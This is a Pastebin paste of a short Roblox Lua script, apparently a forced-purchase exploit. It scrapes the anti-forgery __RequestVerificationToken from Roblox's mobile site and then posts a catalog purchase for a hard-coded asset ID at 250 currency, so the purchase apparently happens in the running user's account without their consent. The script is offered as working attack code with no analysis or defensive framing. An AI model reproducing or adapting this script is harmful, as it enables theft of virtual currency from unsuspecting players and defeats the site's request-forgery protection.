Advertisement
robloxhacker14

noice m8

Jul 19th, 2016
117
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.64 KB | None | 0 0
  1. local aid, ct, uaoi, ep = 82561142, 1, 0, 250
  2. local g=function(fr,p,v,r)
  3. c=game:HttpGet('http://m.roblox.com/home', true)
  4. rvt=c:match('<input name="__RequestVerificationToken" type="hidden" value="(.-)">'):match('(.-)" />')
  5. print(('__RequestVerificationToken=' .. rvt .. '&CurrencyType=' .. ct .. '&AssetID=' .. aid .. '&UserAssetOptionID=' .. uaoi .. '&ExpectedPrice=' .. ep))
  6. game:HttpPost('http://m.roblox.com/Catalog/ProcessPurchase', '__RequestVerificationToken=' .. rvt .. '&CurrencyType=' .. ct .. '&AssetID=' .. aid .. '&UserAssetOptionID=' .. uaoi .. '&ExpectedPrice=' .. ep, true, 'application/x-www-form-urlencoded; charset=UTF-8')
  7. end
  8.  
  9. g()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement